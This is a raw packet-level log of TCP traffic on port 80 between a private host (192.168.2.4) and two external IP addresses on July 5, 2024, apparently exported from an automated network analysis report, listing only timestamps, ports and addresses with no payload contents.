                                                                Jul 5, 2024 04:25:27.655883074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.655883074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.655886889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655896902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655909061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656007051 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656013012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656023979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656033993 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656044006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656066895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656079054 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656090021 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656099081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656099081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656119108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656131029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656146049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656146049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656172037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656182051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656192064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656196117 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656203985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656230927 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656313896 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656322002 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656332016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656342030 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656373024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656399965 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656413078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656424046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656426907 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656434059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.656456947 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.656513929 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667396069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667443037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667500019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667510986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667522907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667587042 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667587042 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667609930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667620897 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667630911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667642117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667711973 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667788029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667799950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667809010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667820930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667830944 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667840958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667850971 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667855024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667861938 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667877913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667877913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667881966 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667891979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667908907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667913914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667923927 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667927027 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667927027 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667937040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667948008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667958975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.667959929 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.667984009 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668062925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668091059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668102026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668112040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668123007 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668138027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668142080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668148994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668162107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668163061 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668180943 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668251991 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668282986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668294907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668303967 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668314934 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668327093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668339014 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668339968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668353081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668366909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668366909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668425083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668436050 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668442965 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668453932 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668492079 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668508053 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668528080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668535948 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668540001 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668601036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668612957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668627024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668648958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668704987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668715954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668726921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668790102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668798923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668809891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668819904 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668831110 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.668834925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668854952 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.668916941 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.727921009 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.727931023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.727945089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.727972031 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.728030920 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.728041887 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.728043079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.728055954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.728112936 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.728112936 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.738785028 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738795042 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738806009 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738861084 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738862991 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.738872051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738883018 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738889933 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.738895893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738913059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738924026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738934994 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.738964081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738976955 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.738985062 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.739022017 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.739032984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.739042044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.739048004 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.739115953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749273062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749283075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749293089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749339104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749349117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749360085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749366045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749371052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749386072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749454975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749464989 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749476910 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749480009 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749522924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749522924 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749522924 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749533892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749543905 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749555111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749625921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749635935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749651909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749715090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749725103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749735117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749738932 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749747038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749761105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749772072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749784946 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749794006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749813080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749834061 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.749851942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749861956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749875069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749885082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.749980927 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.750096083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750117064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750127077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750138044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750185966 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.750185966 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.750209093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750219107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750228882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750238895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.750297070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760687113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760730982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760741949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760804892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760818958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760831118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760838985 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760842085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760854006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760854006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760879040 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760893106 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760904074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760915041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760917902 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760937929 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760943890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760957956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760965109 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.760968924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.760994911 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761023998 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761097908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761166096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761177063 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761226892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761231899 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761231899 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761239052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761248112 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761281013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761291027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761301041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761323929 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761409044 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761410952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761420965 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761430979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761481047 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761492968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761502981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761512995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761544943 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761544943 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761558056 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761571884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761583090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761719942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761769056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761780024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761851072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761861086 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761871099 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761882067 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761892080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761944056 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761944056 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.761969090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761980057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.761990070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.762001038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.762012005 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.762054920 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.762104988 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.998171091 CEST804990777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:27.999397039 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.334362030 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.334750891 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.339015007 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:28.339067936 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:28.339850903 CEST804990777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:28.339909077 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.339945078 CEST804990877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:28.340001106 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.340894938 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:28.344021082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.344031096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.344034910 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.344088078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.344103098 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.345729113 CEST804990877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:28.995729923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:28.995894909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:29.035011053 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:29.035108089 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:29.039825916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:29.039969921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:29.039979935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:29.045754910 CEST804990877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.045857906 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.048017025 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.048299074 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.053081989 CEST804990877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.053148031 CEST4990880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.053172112 CEST804990977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.053530931 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.053937912 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.058670998 CEST804990977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.738033056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:29.738132000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:29.759365082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:29.761506081 CEST804990977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.761616945 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.765292883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:29.895590067 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.895879030 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.900691986 CEST804991077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.900748968 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.900841951 CEST804990977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:29.900890112 CEST4990980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.903429985 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:29.908322096 CEST804991077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:30.618719101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:30.618782043 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:30.641047001 CEST804991077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:30.641099930 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.693435907 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.694191933 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.698718071 CEST804991077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:30.698762894 CEST4991080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.699095964 CEST804991177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:30.699152946 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.699626923 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:30.704535961 CEST804991177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:31.117053032 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:31.121948957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:31.411456108 CEST804991177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:31.415426970 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.522461891 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.522806883 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.528228998 CEST804991177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:31.528249025 CEST804991277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:31.528328896 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.528328896 CEST4991180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.528518915 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:31.533272982 CEST804991277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.673940897 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:32.674002886 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:32.674082041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:32.674105883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:32.674129963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:32.674141884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:32.674216986 CEST804991277.91.77.82192.168.2.4
